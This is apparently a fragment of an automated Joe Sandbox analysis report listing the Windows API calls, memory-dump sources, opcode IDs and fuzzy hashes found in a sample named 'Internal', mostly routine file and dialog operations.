                                        • Part of subcall function 0050A626: 74096BB0.GDIPLUS(00000010), ref: 0050A62C
                                      Similarity
                                      • API ID: 74096AllocGlobal
                                      • String ID: FvnP$PNG
                                      • API String ID: 4246444542-2697718158

                                      APIs
                                        • Part of subcall function 005197E5: _free.LIBCMT ref: 0051981C
                                        • Part of subcall function 005197E5: _abort.LIBCMT ref: 00519863
                                        • Part of subcall function 0051BB4E: _abort.LIBCMT ref: 0051BB80
                                        • Part of subcall function 0051BB4E: _free.LIBCMT ref: 0051BBB4
                                      • _free.LIBCMT ref: 0051BA9F
                                      • _free.LIBCMT ref: 0051BAD5
                                      Similarity
                                      • API ID: _free$_abort
                                      • String ID:
                                      • API String ID: 195396716-0

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F1E55
                                        • Part of subcall function 004F3BBA: __EH_prolog.LIBCMT ref: 004F3BBF
                                      • _wcslen.LIBCMT ref: 004F1EFD
                                      Similarity
                                      • API ID: H_prolog$_wcslen
                                      • String ID:
                                      • API String ID: 2838827086-0

                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00000001,00000001,?,004FA23A,?,004FA2E9,00000001,00000001,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA254
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,004FA23A,?,004FA2E9,00000001,00000001,?,?,004FA175,?,00000001,00000000), ref: 004FA280
                                      Similarity
                                      • API ID: AttributesFile$_wcslen
                                      • String ID:
                                      • API String ID: 2673547680-0
                                      APIs
                                      • _swprintf.LIBCMT ref: 0050DEEC
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • SetDlgItemTextW.USER32(00000065,?), ref: 0050DF03
                                        • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                        • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                        • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                        • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                        • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                      • String ID:
                                      • API String ID: 2718869927-0
                                      • Opcode ID: cfa10aa15be04704df02d2c406a46af42375c50ef59751fed6dd178d824b4a10
                                      • Instruction ID: 4e456abd90ec69a87d72a605bf0bdcc964ba2f06edbe828f89b0c0eb08cd9f17
                                      • Opcode Fuzzy Hash: cfa10aa15be04704df02d2c406a46af42375c50ef59751fed6dd178d824b4a10
                                      • Instruction Fuzzy Hash: 51E09B7240034D26EF01A761DC0AFAE3B6C6B15789F440855B304D71F3D97DDA549665
                                      APIs
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00512BAA
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00512BB5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                      • String ID:
                                      • API String ID: 1660781231-0
                                      • Opcode ID: 9fbc2cbf7098a0ccd15bd3a9a577eb9399871129a6e056e2e18a5a90625a5fe7
                                      • Instruction ID: df76f163e97f49b456e25c06af9e39eecb761067b7720d6146e399de6d4fa5d8
                                      • Opcode Fuzzy Hash: 9fbc2cbf7098a0ccd15bd3a9a577eb9399871129a6e056e2e18a5a90625a5fe7
                                      • Instruction Fuzzy Hash: EED0A93829C202187E242A70282F4C92F45BE92BB5FA0868AE420C54C1EB1190E4A211
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 587628741e4180e843c1b4ebc0cf5516cf45d51950a47bd163c0a09250a4445b
                                      • Instruction ID: 8216df5fbaefc9fd2bf7e8d8c01f328dc378b63c0af8c4d1b17136598744c707
                                      • Opcode Fuzzy Hash: 587628741e4180e843c1b4ebc0cf5516cf45d51950a47bd163c0a09250a4445b
                                      • Instruction Fuzzy Hash: 95C0123205C600BECB010BB4DC29C2BBBA8ABA5312F04C928B0A9C0060C238C114EB11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 07dd30d65df1162b0512c4cbe7b8ff4c175b2e5d4fcc86b499d57d849a6c84a9
                                      • Instruction ID: 90f1ec64da93d35c58fdd48bf2634d068da590c0282ebd66740a784ccab2db98
                                      • Opcode Fuzzy Hash: 07dd30d65df1162b0512c4cbe7b8ff4c175b2e5d4fcc86b499d57d849a6c84a9
                                      • Instruction Fuzzy Hash: F6C1C630A00258DFEF15CF68C494BBA7BA5AF15310F0801BFDE459B3A2DB39A945CB65
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 425c796aafe48b101b126dd6986512ba4a32655b07ce476012cdda16a8acd64f
                                      • Instruction ID: 3adc6626ab5a28001ee35ff290c7adb90f76597a586da0c4f60bc6e5039498fd
                                      • Opcode Fuzzy Hash: 425c796aafe48b101b126dd6986512ba4a32655b07ce476012cdda16a8acd64f
                                      • Instruction Fuzzy Hash: 3671C272500B899EDB25DF70C8559FBB7E9AF14305F40082FE3AB87241DA366684CF15
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,004F9A50,?,?,00000000,?,?,004F8CBC,?), ref: 004F9BAB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: adf30d13c7755be5038855f3eda81a2a38813dd0b096ca34db403b5e162b7825
                                      • Instruction ID: b375855a3f1e1d36bbf3bcaced30ec76ffa7c71635f1f79846bd6d95967bb3c0
                                      • Opcode Fuzzy Hash: adf30d13c7755be5038855f3eda81a2a38813dd0b096ca34db403b5e162b7825
                                      • Instruction Fuzzy Hash: 5741CD30A043498BDB24DF15E58467BB7E5FFD5310F148A2FEA8183360D778BC498A59
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F8289
                                        • Part of subcall function 004F13DC: __EH_prolog.LIBCMT ref: 004F13E1
                                        • Part of subcall function 004FA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004FA598
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog$CloseFind
                                      • String ID:
                                      • API String ID: 2506663941-0
                                      • Opcode ID: 8d65ac3519d01e3be96b3310cffaf16b4b0bdec655d4f978f78218078b679992
                                      • Instruction ID: 29f70c7eb36f4f46be9d62fcaa1a38d3d9b77f857fbe97fe868011f3096e4566
                                      • Opcode Fuzzy Hash: 8d65ac3519d01e3be96b3310cffaf16b4b0bdec655d4f978f78218078b679992
                                      • Instruction Fuzzy Hash: 0E41D67190465C9ADB24DB61CC55AFAB7B8BF00304F0404EFE68A9B193EB795EC5CB14
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 004F995F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5412c677dcef89f09f75c0e10d4e4857467c0c29dbe7f27b8927da4f9b4c2c37
                                      • Instruction ID: 8f7bd85ff98b864e771884a19fa1a85c48e39e37c4e908ac6803e13c149085cf
                                      • Opcode Fuzzy Hash: 5412c677dcef89f09f75c0e10d4e4857467c0c29dbe7f27b8927da4f9b4c2c37
                                      • Instruction Fuzzy Hash: 603116705447496FE7309F24CC49FABBB94BB45320F110B1EF6A1963D0D3E86945CB99
                                      APIs
                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,004FD343,00000001,?,?,?), ref: 004FA011
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 7e68c5a30d0a54c90b5c03c96ea56ad6d9ae7b4d12813bc5e7884053fd38c203
                                      • Instruction ID: 5dabb2474d6097961b80cdc8d57ccc8b35173957cd9f0e5c6be9348a6e5f5ebb
                                      • Opcode Fuzzy Hash: 7e68c5a30d0a54c90b5c03c96ea56ad6d9ae7b4d12813bc5e7884053fd38c203
                                      • Instruction Fuzzy Hash: 4E319F7120430AAFDB14CF20E808B7B77A5EF85715F04451AFA4597290CB79AD49CBAB
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F13E1
                                        • Part of subcall function 004F5E37: __EH_prolog.LIBCMT ref: 004F5E3C
                                        • Part of subcall function 004FCE40: __EH_prolog.LIBCMT ref: 004FCE45
                                        • Part of subcall function 004FB505: __EH_prolog.LIBCMT ref: 004FB50A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 4c8bbac55e4eb30ebd29f10c4a29c662fcaa07b4c6f139129cde258e88ee26f8
                                      • Instruction ID: 427012404594487d924b92dc062d21b6aadd4cb010fca87f543c95ad17955eec
                                      • Opcode Fuzzy Hash: 4c8bbac55e4eb30ebd29f10c4a29c662fcaa07b4c6f139129cde258e88ee26f8
                                      • Instruction Fuzzy Hash: 15415AB0905B45DEE724CF798885AE6FBE5BF19300F50492ED6EE83282CB356654CB14
                                      APIs
                                      • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04AE66FE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID: ExitProcessUser
                                      • String ID:
                                      • API String ID: 3902816426-0
                                      • Opcode ID: c13d47f5b818de5c079a47d1a53d6c0f52e474b0f7b98cdfaf7771f56f4ec1b1
                                      • Instruction ID: c6d7284c92f9356b7ac6318589f4760fd4de1b7db6e56b813457eb58efda2957
                                      • Opcode Fuzzy Hash: c13d47f5b818de5c079a47d1a53d6c0f52e474b0f7b98cdfaf7771f56f4ec1b1
                                      • Instruction Fuzzy Hash: 533128B2D1060CEFDB00DFD5C848BEEBBB8FB58336F20461AE421A6180D7785A048F60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0050B098
                                        • Part of subcall function 004F13DC: __EH_prolog.LIBCMT ref: 004F13E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: c56d3613a20df67d8e904d47e453e41e4370bc63b1a7c4e43b29e596c4c19f30
                                      • Instruction ID: 8bc1dba61dd58066f5f013f4983f03c648ffe130a704bb68a574ee20a934039c
                                      • Opcode Fuzzy Hash: c56d3613a20df67d8e904d47e453e41e4370bc63b1a7c4e43b29e596c4c19f30
                                      • Instruction Fuzzy Hash: CC316C75800249DAEB15DF65C9919FEBBB4BF09304F10449EE409B7292D779AE04CB61
                                      APIs
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 004F9E70
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileTime
                                      • String ID:
                                      • API String ID: 1425588814-0
                                      • Opcode ID: 4733a6c1c568a16c2cac273798cac508c63cd16c5271ed8971f0c5358d24b936
                                      • Instruction ID: 1e73a8a0e289972e0f52e461f8d18969667d5331d9cda157369eb99c78efde3e
                                      • Opcode Fuzzy Hash: 4733a6c1c568a16c2cac273798cac508c63cd16c5271ed8971f0c5358d24b936
                                      • Instruction Fuzzy Hash: EA21EE3124824AABC714CF24C895BBBBBE8AF91304F08481EF5C583681D32CED0D9B66
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004F9F27,?,?,004F771A), ref: 004F96E6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: cd69b7cd98fb795f2aed40c813986189a4f61ed8065cd51b05eae9083e8dd2cf
                                      • Instruction ID: 212d84b40ef7b5f41d04a28be7bdb69c1c8a18a6086eade3f498f84cf9543e71
                                      • Opcode Fuzzy Hash: cd69b7cd98fb795f2aed40c813986189a4f61ed8065cd51b05eae9083e8dd2cf
                                      • Instruction Fuzzy Hash: 1C21CF71500348AFF3309A65CC89BB7B7DCEB59324F100A1AFA95C26D1C778AC859675
                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,004F9C22,?,?,00000000,00000800,?), ref: 004F97AD
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: d3db1b3f438a0addc07b7d1fdfa33f9f069dbe3cbfcf9342c0900bc4df8e4780
                                      • Instruction ID: d68e8fba5b0b35b81e7c518f74338e0d2a6dbabacd68883947ae922537c599cd
                                      • Opcode Fuzzy Hash: d3db1b3f438a0addc07b7d1fdfa33f9f069dbe3cbfcf9342c0900bc4df8e4780
                                      • Instruction Fuzzy Hash: CA11733052430CEBDF317F65C804B7A77A9BF52360F10852BE61685290D77C9E459B69
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 004F9EC7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 07a864422fc8469d9c84b3d04c934ff593aa9f368c9e07112ac956eb19e2a87f
                                      • Instruction ID: 3789062f2375de9b7d3e59a588ac5cd07908aaec767293aa92c15aea8b4516d8
                                      • Opcode Fuzzy Hash: 07a864422fc8469d9c84b3d04c934ff593aa9f368c9e07112ac956eb19e2a87f
                                      • Instruction Fuzzy Hash: 3111E930600708ABD734DA34C884BB7B7E9AB45360F50462BE253D26E0D778ED4AC765
                                      APIs
                                        • Part of subcall function 004FC27E: _wcslen.LIBCMT ref: 004FC284
                                      • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA2D9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CreateDirectory_wcslen
                                      • String ID:
                                      • API String ID: 2011010700-0
                                      • Opcode ID: 043ea383643c7fc64dcf49c3426958091a1c82bb3122d52b81d0997678006205
                                      • Instruction ID: f84004a67f16cc771003a7321e877caf84efe4a135354a20dac1244216bbd36c
                                      • Opcode Fuzzy Hash: 043ea383643c7fc64dcf49c3426958091a1c82bb3122d52b81d0997678006205
                                      • Instruction Fuzzy Hash: F401F9B560021C59EF219B718C49BFF3388DF0A384F04045AFF05D2281D75CCA9196BB
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 196cf4c9fbe8361e1332c00d65ea1b3b502572aae60fcaba21b1dd7aec47eb47
                                      • Instruction ID: 289006923ffadc4fded75789038adf43ccbbcb2ee68d8f7b260febc18449ad34
                                      • Opcode Fuzzy Hash: 196cf4c9fbe8361e1332c00d65ea1b3b502572aae60fcaba21b1dd7aec47eb47
                                      • Instruction Fuzzy Hash: 1001A933D0052CABCF11AB69CD81AEEB776BF88744F01455AEA15B7252DA38CD04C6A4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: d9c1e6196fba87a6d7bbd317fc0d882392e48c4979dd883479385fd89a728a83
                                      • Instruction ID: e4809763359cb7292af7deed3c8f4080231f19a0176cbcea32f6f414a3dcdf7d
                                      • Opcode Fuzzy Hash: d9c1e6196fba87a6d7bbd317fc0d882392e48c4979dd883479385fd89a728a83
                                      • Instruction Fuzzy Hash: 4DF0C23260120666FB312A25AC08BFF3F5CBFD2B70F244725F914AA191DF618DC091A1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F5AC2
                                        • Part of subcall function 004FB505: __EH_prolog.LIBCMT ref: 004FB50A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 8f225010b7a989f0733cd35c0ef67725b14e4a55be322a05e7be793bc04fc007
                                      • Instruction ID: 5ccb9c1258cd341e383a42eafbb83a4fb9e0496f548165e29825fc0026b22d41
                                      • Opcode Fuzzy Hash: 8f225010b7a989f0733cd35c0ef67725b14e4a55be322a05e7be793bc04fc007
                                      • Instruction Fuzzy Hash: 8E01DC70808695DAD724EBB8C0097EDFBE4EFA4308F50848EA456532C2CBB51B08D7A2
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,004F95D6,00000000,Function_00032641,000000FF), ref: 004F963B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 15bc69ad061a33c6f6a7e6ccafb36c10484b8ef0a52d828df9edcefcba45c8f2
                                      • Instruction ID: cb078b51cf16ee91508d9a3ffafbd0de790d53047ba899e67f3fdeaaeb2bf614
                                      • Opcode Fuzzy Hash: 15bc69ad061a33c6f6a7e6ccafb36c10484b8ef0a52d828df9edcefcba45c8f2
                                      • Instruction Fuzzy Hash: 0BF0E930081B199FEB308A34C4487A377E86B12321F140B1FD2E382AE0D3686D8D8A44
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,004FA325,00000001,004F70E6,?,004FA175,?,00000001,00000000,?,?), ref: 004FA501
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AttributesFile_wcslen
                                      • String ID:
                                      • API String ID: 2048169685-0
                                      • Opcode ID: 07cb2880fd213d30cb166baff19a7b0b72570f99154e040bee22b1631eb391d5
                                      • Instruction ID: 328333cef3696410d7c29f8c7e7c705158faecfe5c00dc42f19d7970f2e34fed
                                      • Opcode Fuzzy Hash: 07cb2880fd213d30cb166baff19a7b0b72570f99154e040bee22b1631eb391d5
                                      • Instruction Fuzzy Hash: 4EF0A03220020DBBDF015F60DC09FEA376DBF14385F448051B948D5160DB35DAD9EB64
                                      APIs
                                      • DeleteFileW.KERNELBASE(000000FF,?,?,004F977F,?,?,004F95CF,00000000,Function_00032641,000000FF), ref: 004FA1F1
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: DeleteFile_wcslen
                                      • String ID:
                                      • API String ID: 3339486230-0
                                      • Opcode ID: 656439ad2c06551333fd3c8e04851f577cb7a793234b748aa8963716777c3476
                                      • Instruction ID: 8603a0be111b61857d601880551fe2102c7d1d9d14c8b8b2fd6f8d9baa74b58c
                                      • Opcode Fuzzy Hash: 656439ad2c06551333fd3c8e04851f577cb7a793234b748aa8963716777c3476
                                      • Instruction Fuzzy Hash: F7E022312002096BEB009F20DC09FEA379CFF083C5F080062BA08D2150EB25EED9EA68
                                      APIs
                                        • Part of subcall function 004FA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,004FA592,000000FF,?,?), ref: 004FA6C4
                                        • Part of subcall function 004FA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,004FA592,000000FF,?,?), ref: 004FA6F2
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004FA598
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: Find$FileFirst$Close
                                      • String ID:
                                      • API String ID: 2810966245-0
                                      • Opcode ID: 11d7c3ac51d03bec46b496e997e35c0c41aafe5e8ae040744c684bc453d264af
                                      • Instruction ID: d4d28e9f08d14610276c56828e033b7a78656c24031f31182b7cccc59d91e8e2
                                      • Opcode Fuzzy Hash: 11d7c3ac51d03bec46b496e997e35c0c41aafe5e8ae040744c684bc453d264af
                                      • Instruction Fuzzy Hash: 59F0E271008394AACB2257B48804BEB7BD06F1A335F048A4FF2FD52296C37910A99B37
                                      APIs
                                      • OleUninitialize.OLE32(?,?,?,?,Function_00032641,000000FF), ref: 0050ACB5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: Uninitialize
                                      • String ID:
                                      • API String ID: 3861434553-0
                                      • Opcode ID: e64ea2d697441c3b265be847a8e4c83b2250e577d0255035687df81c7938e592
                                      • Instruction ID: ded5a7b2cdde21b746613cd7c8eb97a96d4a97db64cdff89eebe2317b25bb52c
                                      • Opcode Fuzzy Hash: e64ea2d697441c3b265be847a8e4c83b2250e577d0255035687df81c7938e592
                                      • Instruction Fuzzy Hash: 6FE06D76604A50EFCB119B58DC06B49FFA8FB89B20F10426AF416D37B0CF74B801CA90
                                      APIs
                                      • ___security_init_cookie.LIBCMT ref: 0050F530
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: ___security_init_cookie
                                      • String ID:
                                      • API String ID: 3657697845-0
                                      • Opcode ID: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                      • Instruction ID: b8fa31aaf78919f1e56b001e1823057912b437882c0a0f994b772eb08a42fb25
                                      • Opcode Fuzzy Hash: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                      • Instruction Fuzzy Hash: 0DE0923190824F9BDF35AFD8D8063ED7FB1FB84324F100A75E91123AD1963119408751
                                      APIs
                                      • 74096BB0.GDIPLUS(00000010), ref: 0050A62C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: 74096
                                      • String ID:
                                      • API String ID: 1329529294-0
                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction ID: dc2990593fc10869b968f2ef9983d3fb16fe1069f6bbafafd16125baab013706
                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                      • Instruction Fuzzy Hash: 8FD0C97161030ABADF426B718C1BAAE7EA9FB40340F148925BD42D51D1EAB2D910A662
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0050DD92
                                        • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                        • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                        • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                        • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                        • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                      Memory Dump Source
